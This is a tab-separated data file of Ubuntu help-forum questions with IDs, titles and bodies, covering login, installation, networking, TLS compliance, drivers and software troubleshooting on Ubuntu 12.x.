262527	new as new can be to this . needed password reset . now cant login at all	well . i forgot the password to my laptop . so i asked a friend from work if there was anything that could be done about it . so , of course . i let him `` fix '' it for me . now when i try to login . it accepts the password . then goes to a black screen . it shows some text in the upper left hand corner for a very very brief moment . then goes directly back to the login screen . the text shown appears to be ( i took a blury picture of it ) -starting postgre3ql -starting openbravo-postgresq1 removed stale pid file -starting openbravo-tomcat keep in mind its a very blurry picture so it may not be 100 % acurate . but thats the best i can make it out . i can login to the guest session just fine . i 'm running any help would be appreciated .
262528	how can i get windows active directory functionalities in ubuntu ?	i want to get the same functionalities of windows active directory using ubuntu server 12.04 . is there any tools to do that ? and how can i do that ?
262530	per user lxc containers	i am sure i saw how to do this on a webpage around the intergoogle somewhere . but is it possible to have your system setup so when you create a user on your machine they log into their own lxc container ?
262531	how to detect html5 video playing in chrome ?	i am using a script to delay screensaver in xubuntu 12.04 while video playing . however , the script can only detect flash player in google chrome . i want to add a new function to detect html5 video playing . i searched a lot but did n't find the shell command to detect html5 video process in google chrome . could anybody give me some suggestion about itďź thanks .
262532	how to open a file with drag to application ?	i use gpsprune to view some gps dumps , unfortunately there is no setting to double-click and open the files in the viewer . in older versions of ubuntu you could just drag any file to the icon of an application , how do i do that or enable that in 12.10 ?
262533	ubuntu restarts if dash menu is clicked	glad i have a serious problem with my 12.10 because whenever the dash menu is clicked , it causes my computer to restart . how can i fix this issue ?
262534	kde power management not turning screen off	this seems to be the opposite problem most people ask with kde pm . i have a laptop running ubuntu 12.10 and kde 4.10 . after the last couple of updates ( i 'm not sure which one ) , my screen stopped turning off after the power management timeout has been reached . this occurs with no screensaver , basic screensaver , or any of the others . it does seem to work the first time after a fresh boot . does anyone have any ideas about things i could check to get my screen to turn off ?
262539	wine applications uninstalled still appear	applications within wine that i uninstalled still appear in the applications menu .
262541	can not find installation.iso ?	i 've been attempting to install ubuntu for a few hours now , and i keep getting an error after the reboot telling me the installation.iso was n't found . i 've tried using the wubi installer , and tried chkdsk /r , multiple times to no avail . using a cdrom is n't an option for me , and i feel dumb , but i ca n't get it to run from a usb stick , either . advice/opinions/help ?
262542	ca n't pass pci scans for vulnerability compliance ssl_op_dont_insert_empty_fragments	i 'm trying to pass a pci scan , i 'm on ubuntu 12.04 lts server and nginx . i 've tried everything i know and did a lot of research ... apparently seems that need to disable a setting in openssl which i ca n't find how to do . this is the result of the scan : ssl/tls protocol initialization vector implementation information disclosure vulnerability www ( 443/tcp ) cvss score : medium 4.3 - fail cve-2011-3389 and this is the suggested fix by the pci scanner company : configure ssl/tls servers to only use tls 1.1 or tls 1.2 if supported . configure ssl/tls servers to only support cipher suites that do not use block ciphers . apply patches if available . openssl uses empty fragments as a countermeasure unless the 'ssl_op_dont_insert_empty_fragments ' option is specified when openssl is initialized . i do n't know how to do this , i 've tried it all , please help i 'm going crazy : ) how do i disable this ssl_op_dont_insert_empty_fragments option ? ? ? note : tlsv1.1 and tlsv1.2 are not enabled right now . i upgraded to latest verions of all ( ubuntu 12.04 lts , nginx1.2.7 and openssl 1.0.1 ) . i 've read that the latest versions takes care of the the issue ( tls being not supported by default ) . but i 'm getting the exact same report from the scan . see below my web server configuration , i did everything i had to with ciphers , still getting the same result : server { listen 192.xxx.xx.xx:443 ssl ; server_name mydomain.org alias *.mydomain.org ; keepalive_timeout 70 ; # ssl_ciphers rc4 : high : ! anull : ! md5 : ! kedh ; ssl_ciphers ecdhe-rsa-aes128-sha256 : aes128-gcm-sha256 : rc4 : high : ! md5 : ! anull : ! edh ; ssl_prefer_server_ciphers on ; ssl_protocols sslv3 tlsv1.1 tlsv1.2 ; ssl_session_cache shared : ssl:10m ; ssl_session_timeout 10m ;
262547	installing ubuntu with the windows installer ?	is it safe as instructions said ? if i install ubuntu by this way , could i while updating ubuntu update grub ? because i saw this way install ubuntu , when start ubuntu is using windows 's boot manager .
262565	how to have gnome-applet 's functionality with unity ?	with gnome-fallback and classic gnome shell , we had gnome applets available , but not in unity . there was a system monitoring applet there that i could see may cpu and network bandwith used . i 'm pretty sure that i can not have the same applets in unity , at least not yet , from can i use gnome applets in unity ? . but how can i have such functionality with unity that shows me my system status in the upper panel ? or how can i create such thing ? edit : one possible way might be to create a program to monitor network and changing icon in notification area is one way in order to show status .
262566	confusion with mount points in linux	i am a former windows user who has migrated to linux ( read ubuntu ) full time . though in my pc i have kept the windows partitions intact , i have bought a new laptop whose hard disk i want to partition . had it been windows , i would have partitioned its 1 tb partition as follows : music - 250 gb videos - 550 gb important - 100 gb swap - 8 gb os - 23 gb now in linux , i know the mount points for some , os - / home - /home but i ca n't understand what mount points to set for music , videos and the important partition containing family photos and documents . i 'll be grateful , if anyone could shed some light on it . thanks eg
262568	how do i permanently stop ubuntu from `` recording '' and displaying recently used files ?	how does one permanently turn off any and all system `` recording '' of used apps , directories , or files in ubuntu 12.10 ? i specifically do not want a list of my recently used files showing up in my menu for anyone who may be looking over my shoulder to see . i have tried turning off everything in the `` privacy app '' , and i have also told the app not to record activity from specific directories , files , and applications and i still see that my system is recording recently used files . any help on how to permanently turn off the recently used file list would be very appreciated . i do not merely want to prevent the recently used files from being displayed in the menu , i also want to make sure the system is not keeping any record of recently used files , directories , or applications anywhere on the system . i would like to be able to do this from the privacy app , as that 's what it implies it 's supposed to do anyway , but obviously does n't .
262569	developing ubuntu phone apps using .net through monodevelop	i would like to know whether ubuntu for phones support developing apps using .net ( created through monodevelop ) as we can do it for ubuntu desktop . thanx and regards uday gupta
262571	places to download ubuntu for chrome os via command line ?	i 'm trying to install ubuntu on my chromebox . i have found several tutorials online and i have gotten to the middle of the process but i always run into a snag . i have been typing in the address as specified in the tutorials in the command line but i keep on getting that the file is `` read only '' or `` no file directory exists . '' am i doing something wrong in the command line or am i looking in the wrong place ?
262572	minimal cd installation procedure	i 'm attempting to install 12.04 lts desktop on an old ( circa 2005 ) sony laptop computer ( pentium iii , 512mb ram , 120gb hdd , intel 1400x1050 video , wired ethernet connection to internet ) that does n't support booting from usb nor from burned dvds ( only from burned cds or dvd-roms ) . the full 12.04 desktop iso image is too big to burn to a cd-r , and a dvd-r is not an option . based on what i 've read in the installation documents online , the `` minimal cd '' seemed like a workable option . first question : is the minimal install cd my best option ? i successfully downloaded and burned the iso image to a cd-r disc using disk utility on a mac , and it boots . here 's a quote from the installation document : '' to install , boot your computer from the the minimal cd and type `` cli '' ( command line install ) at the prompt . you can then follow the instructions from the text-based installer . after the base system is installed , log in , and type `` sudo tasksel '' to select the system to install . '' i do n't get a command prompt , i get a menu with options `` install '' , `` command line install '' , `` advanced options '' , `` help '' . i 'm confused here . follow what instructions , from what text-based installer ? second question : am i going down the wrong path at this point ? i assume the menu is an enhancement to the command prompt method . no matter which of the first two options i choose , the machine responds by hitting the cd drive again , followed by a 30-second or so pause , followed by garbled graphics at the bottom of the screen , nothing more . eventually , i discovered the tab key to edit the menu options . i tried removing the word `` quiet '' in hopes of seeing what was going on . that was helpful . the process is pausing complaining about an undefined video mode 314 . i noticed that the command line had a flag `` vga=788 '' . 788 decimal is 314 hex . so i pressed the space bar to see my video mode options . mode 0 is 80x25 . so i started over and changed the flag to `` vga=0 '' . no more complaint about video mode . question three : what is the 788 mode all about , and did i do the right thing by changing it to zero ? at this point it hits the internet downloading for a few seconds , then minutes go by with no activity . eventually , i get on-screen progress bars showing additional downloads and possible progress . i start getting prompted with installation questions , some of which are obvious , but some of which i had to use my intuition . eventually i reach the end of the install process , remove the cd , reboot , and ... white screen with vertical black bars , some sort of unreadable text ( maybe ubuntu logo ) in the middle of the screen . after a short delay , the screen clears to all white and more unreadable text . it responds to keyboard input . looks like it could be login screen , but all the text is `` backwards '' , i.e . mirrored , and unreadable . reboot . now i get white garbled text on black background . same behavior otherwise . any advice ? by the way , prior to trying ubuntu , this machine was running winxp sp3 with no problems . this is my first post here , and my second installation experience with ubuntu . i successfully installed 12.04 on another old laptop which was able to boot from a dvd i burned with the full desktop iso image .
262574	how to correct glib-2.35.x 'g type_init is deprecated ' error when compiling from source	hi i 'm trying to compile gnome-packagekit from source git : //git.gnome.org/gnome-packagekit and when i try and make i get the error above error : âg_type_initâ is deprecated ( declared at /usr/local/include/glib-2.0/gobject/gtype.h:669 ) [ -werror=deprecated-declarations ] cc1 : all warnings being treated as errors i 've looked this up and it seems to be because glib-2.35.4 has deprecated the g_type_init call . ( i do n't actually know what that means ) . it also seems to be related to wperror checks according to some commentators . the output of autogen.sh is gnome-packagekit 3.7.6 ============================= prefix : /usr/local compiler : gcc cflags : -g -o2 cppflags : -werror -wall -wreturn-type -wdeclaration-after-statement -wno-uninitialized -wshadow -wpointer-arith -wcast-align -wwrite-strings -winline -wformat-nonliteral -wformat-security -wswitch-default -winit-self -wmissing-include-dirs -wno-strict-aliasing -wundef -waggregate-return -wmissing-format-attribute -g -fexceptions gnome-packagekit 3.7.6 ============================= prefix : /usr/local compiler : gcc cflags : -g -o2 cppflags : -werror -wall -wreturn-type -wdeclaration-after-statement -wno-uninitialized -wshadow -wpointer-arith -wcast-align -wwrite-strings -winline -wformat-nonliteral -wformat-security -wswitch-default -winit-self -wmissing-include-dirs -wno-strict-aliasing -wundef -waggregate-return -wmissing-format-attribute -g -fexceptions which suggests this might have something to do with it . wonder if there is an easy way to tell the compiler to use the old version of glib or to ignore werror checks .
262575	is it preferable to boot from an sd card or from a usb flash drive ?	i recently purchased a chromebook ( arm ) . it has an sd card reader and a usb 3.0 port , but i have neither an sd card nor a usb 3.0 flash drive ! if i were to boot from ubuntu on one of those two devices , which would give me better performance ? which should i purchase ? to be clear , the devices i 'm choosing from are : class 10 sd card usb 3.0 flash drive
262576	stateless auto configuration ipv6 in ubuntu 12.04	i have installed ubuntu 12.04. i heard that ethernet interface automatically get a link local address but in my ubuntu box it 's not getting link local address . command ifconfig -a output link encap : ethernet hwaddr 00:1b:38 : a1 : a2:50 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:19 when i trying to assign it manually using command ifconfig eth0 inet6 add fe80 : :21b:38ff : fea1 : a250/64 it assigned to interface eth0 . but when i try to ping it using ping6 -i eth0 fe80 : :21b:38ff : fea1 : a250 it gives connect : can not assign requested address ping6 ubuntu command ip -6 route get fe80 : :21b:38ff : fea1 : a250 gives fe80 : :21b:38ff : fea1 : a250 from : : via fe80 : :21b:38ff : fea1 : a250 dev eth0 metric 0 cache this may have some clue for someone .
262585	autohide unity launcher in gnome classic	i am using the unity launcher in the gnome classic desktop . how can i enable the autohide feature for the launcher ? background information : i reverted to gnome classic desktop as described here : how to revert to gnome classic desktop ? next , i start unity-2d-shell as described here : ubuntu 12.04 gnome classic and unity launcher
262589	alternative to notes app from mac osx lion	is there an alternative app that is similar to mac os x lion notes app which i use on my ubuntu ? i saw my friend using notes app on his macbook and i really thought it was useful application in day to day office work . just for those who dont know about notes app in mac osx lion here is the link
262590	dependancy error wine 64	have followed instructions per luis alvarado nov 16 '12 18.36 and get the following : the following packages have unmet dependencies : wine1.5 : depends : wine1.5-i386 ( = 1.5.24-0ubuntu1 ) but it is not installable recommends : fonts-droid but it is not going to be installed recommends : ttf-mscorefonts-installer but it is not going to be installed recommends : fonts-horai-umefont but it is not going to be installed recommends : fonts-unfonts-core but it is not going to be installed recommends : winbind but it is not going to be installed recommends : winetricks but it is not going to be installed e : unable to correct problems , you have held broken packages . how do i resolve this ?
262591	installing ubuntu on uefi enabled pc	wait . this is not just another question on running ubuntu alongside windows 8 ! i have asus n56vj notebook that comes preinstalled with windows 8 . my final aim is to have ubuntu with windows 8 , which i havent been able to make progress on , but thats not my question . so i decided to have ubuntu as the sole os on the notebook.. and decided to use the whole hdd for ubuntu . but when the setup progresses.. and the installer goes of to partition the hdd.. i get the following error : /dev/sda contains gpt signatures , indicating that it has a gpt table . however , it does not have a valid fake msdos partition table , as it should . perhaps it was corrupted -- possibly by a program that doesn't understand gpt partition tables . or perhaps you deleted the gpt table , and are now using an msdos partition table . is this a gpt partition table ? this is the same error that i was getting with gparted when i was trying to install ubuntu alongside windows 8.. but why am i not able to have only a single os.. i dont want this gpt mess . i know its advanced tech.. but its no good if i cant put an os of choice on my $ 1000 m/c . i have disabled secureboot , fast boot , without which i couldnt even boot my ubuntu usb bootable disk.. so in effect i am booting the hdd in legacy mode and i dont want any part of gpt ( the reason why chose to partition fully and give ubuntu the full space with no other partitions on the hdd . ) but still the error says /dev/sda contains gpt signatures ? and that too on a hdd which had all unpartitioned space ? whats going on ? how can i install ubuntu on my notebook ?
262593	vidalia was unable to start tor . permission problem	the exact message is : vidalia was unable to start tor . check your settings to ensure the correct name and location of your tor executable is specified . tor exists but vidalia could n't see or read it . i click `` browse '' & it says : unable to save bookmarks in /home/me/.kde/share/apps/kfileplaces/bookmarks.xml . reported error was : unable to open temporary file.. this error message will only be shown once . the cause of the error needs to be fixed as quickly as possible , which is most likely a full hard drive . i added rwx permissions but problem does n't resolve . i tried to run it as su , but there is problem with fontconfig & vidalia could n't connect to x-server . of course i can use tor with tor-browser . i use kubuntu 12.10 , vidalia 0.2.2 . ( i have seen this problem recently in ubuntu 12.04 as well ) .
262594	ubuntu 12.10 application toplevel menu mnemonics not available	under prior versions of ubuntu ( not sure which ) an alt-key combination activates the application menu and show a corresponding sub-menu . for example , pressing alt-f from most applications expands the file submenu ( which might show open with o underlined , save with s underlined , etc. ) . ( this is behavior also common to windows . ) under 12.10 the menu mnemonics are underlined only for submenus . however , no such mnemonics appear for the top level menu . for example , for chrome , i just see the words file , edit , view , history , help , and nothing has underlines . this behavior exists regardless of the application . is this a new design feature of unity , or is there a way to reactivate the application 's toplevel menu mnemonics ? i found unity top menu keyboard shortcuts for desktop alone , no programs running ; this looks like a very similar problem ( if not the same ) , but does n't offer a satisfactory resolution . i want to be able to continue using a single key-combination ( e.g . alt-f ) to be able to see the appropriate corresponding submenu . thanks !
262598	e : unable to locate package repo	e : unable to locate package repo this error comes after sudo apt-get install repo
262602	configure tlsv1.1 and tlsv1.2	is there a way to enable tls v1.1 and tls v1.2 , which are now disabled ?
262605	failed to download package files	i have been trying to update my system in order to install audacity . i got most of the updates to work but not the security updates for some reason . now every time i try and download audacity from the software centre it comes up with the message 'failed to download package files : check internet connection . ' there does not appear to be anything amiss with the net so i 'm at a loss . also i 'm not very good with comp/tech issues so please respond with advice that is a step-by-step as possible . i 'm very happy with ubuntu system overall but lack the tech ability when it goes wrong . thank you .
262606	ubuntu and thunderbird forget my settings -- how can i stop this ?	a greenhorn here , so apologies for not spotting a probably simple solution . ubuntu unity sometimes loads with wireless internet switched off . thunderbird never remembers basic user settings such as `` check for new rss on startup . '' both are annoying . can anyone help ? ( lenovo laptop , in case this is relevant )
262608	possible to move windows between x-displays ? hopes lifted because bin/gimp can do this	for the longest time i have been convinced that it is not possible to move windows between x displays , and this question has been asked a few times only to be shot down as here : can not move monitors between monitors but , i noticed a few days ago that if you use the 'gimp ' program , each of the windows actually contains an option to move itself to any of the available x displays on your machine . anyone have an idea of what it 's doing ? is it really destroying the window and creating a new one from scratch , or is there some hidden shell trick that can be extracted ? i
262611	how do i find out on which partition is my windows ?	i have fully functional windows and ubuntu that is broken ( i accidentaly broke it ) and want to do reinstall . with live-cd , i can see : 3 ntfs partitions , one ext4 and one unknown . how do i find out which partitions belong to windows ? i thought that i might delete everything that was n't ntfs , but i was afraid . now i am using : install ubuntu alongside them option , but i guess that this will leave my broken ubuntu untouched . so , again , i need to know which partitions to merge ( perhaps add partitions of broken ubuntu to new ubuntu ? ) . please , how can i learn how my system is divided ? thanks a lot .
262612	wifi not working toshiba satellite c855-1w7 ubuntu12.10	i am very new to ubuntu and have tried following other threads to resolve this issue but keep getting errors would someone be able to guide me step by step
262613	after uninstalling ubuntu , does the ubuntu partition get added back to the windows partition ?	i have installed ubuntu alongside with windows . now i want to uninstall ubuntu . after i delete the ubuntu partition using windows disk manager , will the ubuntu partition be added to my windows partition ?
262614	change default option on dual boot screen	i want to know how i can change the default selected option on the gnu grub dual boot screen displayed on system start-up . i have a windows 7 and ubuntu dual boot pc . currently there is a countdown timer that auto boots into ubuntu if the time runs out . this is quite annoying since i use ubuntu seldom . i do not want to select windows 7 every time . how can i change the default to windows 7 ? see image below of dual boot screen .
262615	how do i ensure that security updates are installed on juju machines ?	it seems that security updates and other package updates are not automatically installed in juju nodes . i assume that they are installed at installation of new juju machines , or that the installation media is a daily updated version of ubuntu . how do i ensure that updates are installed in all machines ? and what about reboots to install kernel updates ?
262617	how to run ubuntu 12.10 from pen drive ?	i seen the computer being run directly from the pen drive as in http : //www.youtube.com/watch ? v=pggbzfr6vec i want to run my computer from my pendrive too but i do not know how to do it . can you please guide how could i install ubuntu in my pendrive and run os from the pendrive ?
262618	how do i remove libav files ?	i just installed 12.04 and can not watch youtube . i was advised to install `` ubuntu restricted extras '' from ubuntu software center . but , during the installation , i got the warning that libav codec library ( libav codec 53 ) and libav utility library ( libav util 51 ) should be removed before installing `` restricted extras '' . how do i go about removing these libraries ? thank you for your patience .
262620	unable to mount 215 gb filesystem	i have two os in same laptop : one is windows 8 and other is ubuntu 12.04 lts . my installation went fine and ubuntu works fine . i have two hard drives in my ubuntu they are 201 gb , and 215 gb . the problem is when i try to open my 215 gb drive i am getting error as : error mounting : mount exited with exit code 14 : windows is hibernated , refused to mount . failed to mount '/dev/sda2 ' : operation not permitted the ntfs partition is hibernated . please resume and shutdown windows properly , or mount the volume read-only with the 'ro ' mount option , or mount the volume read-write with the 'remove_hiberfile ' mount option . for example type on the command line : mount -t ntfs-3g -o remove_hiberfile /dev/sda2 /media/f44ec8724ec82f64 i have googled and found that i should use : sudo mount -t ntfs-3g -o remove_hiberfile /dev/sda2 /media/f44ec8724ec82f64 i can open my drive when i type that command , but the problem is when i restart the system and try to open the same 215 gb drive again i am getting same problem . is there any permanent way of solving this problem , instead of running that command everytime when i start ubuntu ?
262622	mac keyboard ( slim w/numpad ) - ca n't select multiple alt/win key behaviors ?	as i 'm switching between my macbook air and my new ubuntu stationary frequently , i 'd like to use mac keyboard and key combos for both . i 'd like to select two of the options below , not just one '' left alt is swapped with left win '' solved a lot of problems , allowing me to switch between running apps . `` meta is mapped to win keys '' made my rubymine work smoothly , as meta/cmd key is used for a lot of shortkeys . please advice , thanks !
262631	how can i convert video to divx4 to play on my kogan tv ?	i want to convert some videos to play on my kogan tv using a portable hard-drive , but i am having trouble getting it to work . most of my avi files , encoded using as xvid , all come up as 'unsupported file ' on the tv . the only file that i 've found that works is reported as being the following by file : test.avi : riff ( little-endian ) data , avi , 640 x 464 , 23.98 fps , video : divx 4 , audio : mpeg-1 layer 3 ( stereo , 48000 hz ) but i ca n't seem to work out a suitable avconv command line to convert anything else to that format . the tv claims to support ( from here ) : avi ( mpeg - 1/2 and mpeg-4 divx 4 coded ) and mp4 ( mpeg - 1/2 and mpeg-4 divx 4 coded )
262632	is there a fancy vertical notification osd that works for both alsa and pulseaudio ?	is there a fancy way to get the volume notification osd to work with both pulseaudio and alsa ? right now the standard desktop ones only work with pulseaudio for me . how about a vertical osd that i can use as a drop in replacement or call from the command line to report changes in arbitrary percentages graphically , as a bar that moves up and down ? the reason why i need it to work with both alsa and pulseaudio is that i 'm using a wine application which does n't play well with pulse , so i kill pulse before starting up the windows app to use alsa without the extra abstraction layer . when i realized that the volume keys on my keyboard did n't work without pulse , i wrote some bash scripts that i call with either compiz or openbox ( configured through ccsm and lxde-rc.xml , respectively ) to catch the exit signal from pulseaudio -- check and then adjust the volume accordingly : vol_step_up # ! /bin/bash pulseaudio -- check if [ $ ? -eq 0 ] ; then pactl set-sink-volume 0 -- +3db else amixer -c0 set master playback 3+ fi vol_step_down # ! /bin/bash pulseaudio -- check if [ $ ? -eq 0 ] ; then pactl set-sink-volume 0 -- -3db else amixer -c0 set master playback 3- fi the scripts work great and map to the buttons just fine , but i do n't have a good way of seeing the visual feedback anymore -- not even with the pulseaudio ones since i ' m catching the button events ( xf86audiolowervolume , etc. ) . obviously i could just map the alsa volume keys to something else , but there 's no sense in duplicating shortcut keys . i did find a python volume control that i can call in the scripts above : https : //github.com/fishman/utils/blob/master/pvol.py pvol.py -s shows the current volume level on screen for both alsa and pulseaudio , but it 's awfully tiny compared to the gnome osd i had been using , and it is n't vertical ( bar on top , old osd at bottom ) : so , i made it bigger and flopped it around : but , even with switching the orientation to a vertical one , the blue default gtk theme is n't quite as slick as vlc ( see below ) . much of what i 've found in searching for osd implementations are posts about notify-send commands which lack the whole progress bar concept . otherwise , it 's mostly horizontal bars ( and lots of counting placeholders within bash scripts ) . really all i need to do is call amix & pactl , so something simple like the gtk progress bar in pvol.py would be great -- just not so blue and not right in the middle of the screen . vlc has a good example of what i have in mind when you scroll the mouse wheel in full-screen mode : it 's a lot less obstructive than the usual boxes that sit in the center of the screen : the whole horizontal slider analogy has never made much sense to me outside of panning audio between the left and right speakers . anyway , how is it that the default desktop notifications get called ( especially lxde ) ? i see a lot of posts about configuring key press events , but not much on what scripts those events trigger . what other options are out there in the vertically fancy department ? also , is there some package i should uninstall to prevent conflicts from springing up between the events i 'm handling through scripting and compiz or openbox commands ? update : for the sake of figuring out what osd i 'm currently using , i did n't change the way i handle the mute button right away . killing xfce4-notifyd and then pressing the mute button spawns a new xfce4-notifyd process , so i was guessing the big speaker icon came from something like xfce4-volumed , but i do n't actually have that package installed ... ah ha ! killing gnome-settings-daemon stops the big osd in the center of the screen .
262634	is there an alternative to softaculous ampps ?	i would like to know if there is an alternative software stack like ampps so i can install web apps in one click ?
262641	driver for d2xxx/n2xxx vga very slow	i 've just bought an asus x101ch netbook and installed ubuntu 12.10 on it . the netbook has a d2xxx/n2xxx vga device , which works , but the driver is very slow . all the graphics tricks that unity plays take an annoying amount of time . is there an alternative version of the driver i can install ?
262644	how can i install bluetooth driver in lenovo b570e ?	any body help me out to install bluetooth driver in lenovo b570e .
262647	how do i install ubuntu for phone on samsung galaxy mini ?	any completed procedure to install ubuntu on samsung galaxy mini .
262649	opening .wrl files	i am working with ubuntu 12.10 . i am creating vrml ( .wrl ) files with a c program and they can be easily open with meshlab . now , i want to open .wrl files with meshlab automaticly . how can i do that ? by right clicking myfile.wrl and trying open with another application ... i get : no applications available to open `` myfile.wrl ''
262650	disk partitioning ubuntu 12.10	i am planning to install ubuntu 12.10 along with windows . i would like to know how to partition the drive so that i can access all my data in windows and keep one separate 20 gb for ubuntu ... thank you..
262655	not able to run juju bootstrap : error you are not allowed to start up this node	trying to install maas server with juju using 12.10 ubuntu . maas was well installed with separate dhcp/dns server . created then : ~/.juju/environments.yaml with the following content : juju : environments environments : maas : type : maas maas-server : 'http : //mymaasipaddress' maas-oauth : ' $ { maas-api-key } ' admin-secret : 'nothing' then run ssh-keygen after adding the mac address of node01 in maas . i noticed that wake on lan works and the new node being booted and installed buuuuut..once trying to create my juju env with : juju bootstrap it returns : 590 info bootstrapping environment 'maas ' ( origin : ppa type : maas ) ... 005 error failed to launch machine /maas/api/1.0/nodes/node-0516f9b8-825d-11e2-90af-0050561dd02a/ ; attempting to release . traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/juju/providers/maas/launch.py '' , line 49 , in start_machine instance_uri , series , cloud_init.render ( ) ) file `` /usr/lib/python2.7/dist-packages/twisted/internet/defer.py '' , line 551 , in _runcallbacks current.result = callback ( current.result , *args , **kw ) file `` /usr/lib/python2.7/dist-packages/juju/providers/maas/maas.py '' , line 82 , in _process_error raise providererror ( error.response ) providererror : you are not allowed to start up this node . 133 error you are not allowed to start up this node . it seems as authentication process goes wrong . however the maaskey was copied from the maas gui once generated new one . the node is being changing its status to ready but could not bootstrap juju ? ? ? ? any idea ? ? ?
262661	how do i play freespace 2 open	i went to the download-page downloaded the fs2_open_3.6.16.tar.bz2 package , extract it . runned it like so ./fs2_open_3.6.16 but i get the below error : ./fs2_open_3.6.16 : error while loading shared libraries : liblua5.1.so.0 : can not open shared object file : no such file or directory ( the liblua5.1-0 package is installed ) i tried ln -s ./liblua-5.1.so.5.1.x liblua-5.1.so but it did n't work , same error . question : how do i fix this error and play the game note : i am using ubuntu 12.10 the output of : ldd ./fs2_open_3.6.16 linux-vdso.so.1 = > ( 0x00007fffa22cc000 ) libsdl-1.2.so.0 = > /usr/lib/x86_64-linux-gnu/libsdl-1.2.so.0 ( 0x00007f0566c3e000 ) libvorbis.so.0 = > /usr/lib/x86_64-linux-gnu/libvorbis.so.0 ( 0x00007f0566a11000 ) libvorbisfile.so.3 = > /usr/lib/x86_64-linux-gnu/libvorbisfile.so.3 ( 0x00007f0566808000 ) libtheora.so.0 = > /usr/lib/x86_64-linux-gnu/libtheora.so.0 ( 0x00007f05665b7000 ) libogg.so.0 = > /usr/lib/x86_64-linux-gnu/libogg.so.0 ( 0x00007f05663b0000 ) libopenal.so.1 = > /usr/lib/x86_64-linux-gnu/libopenal.so.1 ( 0x00007f0566156000 ) libgl.so.1 = > /usr/lib/nvidia-current-updates/libgl.so.1 ( 0x00007f0565e39000 ) libglu.so.1 = > /usr/lib/x86_64-linux-gnu/libglu.so.1 ( 0x00007f0565bba000 ) libpng12.so.0 = > /lib/x86_64-linux-gnu/libpng12.so.0 ( 0x00007f0565993000 ) liblua5.1.so.0 = > /usr/lib/x86_64-linux-gnu/liblua5.1.so.0 ( 0x00007f0565766000 ) libjpeg.so.62 = > /usr/lib/x86_64-linux-gnu/libjpeg.so.62 ( 0x00007f0565541000 ) libstdc++.so.6 = > /usr/lib/x86_64-linux-gnu/libstdc++.so.6 ( 0x00007f056523d000 ) libm.so.6 = > /lib/x86_64-linux-gnu/libm.so.6 ( 0x00007f0564f41000 ) libgcc_s.so.1 = > /lib/x86_64-linux-gnu/libgcc_s.so.1 ( 0x00007f0564d2b000 ) libc.so.6 = > /lib/x86_64-linux-gnu/libc.so.6 ( 0x00007f056496b000 ) libpthread.so.0 = > /lib/x86_64-linux-gnu/libpthread.so.0 ( 0x00007f056474e000 ) libasound.so.2 = > /usr/lib/x86_64-linux-gnu/libasound.so.2 ( 0x00007f0564464000 ) libdl.so.2 = > /lib/x86_64-linux-gnu/libdl.so.2 ( 0x00007f056425f000 ) libpulse-simple.so.0 = > /usr/lib/x86_64-linux-gnu/libpulse-simple.so.0 ( 0x00007f056405b000 ) libpulse.so.0 = > /usr/lib/x86_64-linux-gnu/libpulse.so.0 ( 0x00007f0563e13000 ) libx11.so.6 = > /usr/lib/x86_64-linux-gnu/libx11.so.6 ( 0x00007f0563ad8000 ) libxext.so.6 = > /usr/lib/x86_64-linux-gnu/libxext.so.6 ( 0x00007f05638c6000 ) libcaca.so.0 = > /usr/lib/x86_64-linux-gnu/libcaca.so.0 ( 0x00007f05635f9000 ) librt.so.1 = > /lib/x86_64-linux-gnu/librt.so.1 ( 0x00007f05633f0000 ) libnvidia-tls.so.304.51 = > /usr/lib/nvidia-current-updates/tls/libnvidia-tls.so.304.51 ( 0x00007f05631ed000 ) libnvidia-glcore.so.304.51 = > /usr/lib/nvidia-current-updates/libnvidia-glcore.so.304.51 ( 0x00007f0560e03000 ) libz.so.1 = > /lib/x86_64-linux-gnu/libz.so.1 ( 0x00007f0560beb000 ) /lib64/ld-linux-x86-64.so.2 ( 0x00007f0566f05000 ) libpulsecommon-2.1.so = > /usr/lib/x86_64-linux-gnu/pulseaudio/libpulsecommon-2.1.so ( 0x00007f056098e000 ) libjson.so.0 = > /usr/lib/x86_64-linux-gnu/libjson.so.0 ( 0x00007f0560784000 ) libdbus-1.so.3 = > /lib/x86_64-linux-gnu/libdbus-1.so.3 ( 0x00007f0560540000 ) libxcb.so.1 = > /usr/lib/x86_64-linux-gnu/libxcb.so.1 ( 0x00007f0560322000 ) libslang.so.2 = > /lib/x86_64-linux-gnu/libslang.so.2 ( 0x00007f055ff91000 ) libncursesw.so.5 = > /lib/x86_64-linux-gnu/libncursesw.so.5 ( 0x00007f055fd64000 ) libtinfo.so.5 = > /lib/x86_64-linux-gnu/libtinfo.so.5 ( 0x00007f055fb3c000 ) libwrap.so.0 = > /lib/x86_64-linux-gnu/libwrap.so.0 ( 0x00007f055f931000 ) libsndfile.so.1 = > /usr/lib/x86_64-linux-gnu/libsndfile.so.1 ( 0x00007f055f6cb000 ) libasyncns.so.0 = > /usr/lib/x86_64-linux-gnu/libasyncns.so.0 ( 0x00007f055f4c5000 ) libxau.so.6 = > /usr/lib/x86_64-linux-gnu/libxau.so.6 ( 0x00007f055f2c0000 ) libxdmcp.so.6 = > /usr/lib/x86_64-linux-gnu/libxdmcp.so.6 ( 0x00007f055f0ba000 ) libnsl.so.1 = > /lib/x86_64-linux-gnu/libnsl.so.1 ( 0x00007f055eea0000 ) libflac.so.8 = > /usr/lib/x86_64-linux-gnu/libflac.so.8 ( 0x00007f055ec53000 ) libvorbisenc.so.2 = > /usr/lib/x86_64-linux-gnu/libvorbisenc.so.2 ( 0x00007f055e784000 ) libresolv.so.2 = > /lib/x86_64-linux-gnu/libresolv.so.2 ( 0x00007f055e568000 ) i downloaded fs2open3616_1.0-1_amd64.deb insalled it with the software-center , and i also installed the missing lib files ( i386 ) which it needed according to the ldd ./fs2_open_3.6.16 command , like so sudo apt-get install liblua5.1-0:1386 ( after installing the i386 lib i updated the output of ldd ./fs2_open_3.6.16 ) here is the error : error : `` web cursor bitmap not found . this is most likely due to one of three reasons : 1 ) you 're running freespace open from somewhere other than your freespace 2 folder ; 2 ) you 've somehow corrupted your freespace 2 installation , e.g . by modifying or removing the retail vp files ; 3 ) you have n't installed freespace 2 at all . ( note that installing freespace open does not remove the need for a freespace 2 installation . ) number 1 can be fixed by simply moving the freespace open executable file to the freespace 2 folder . 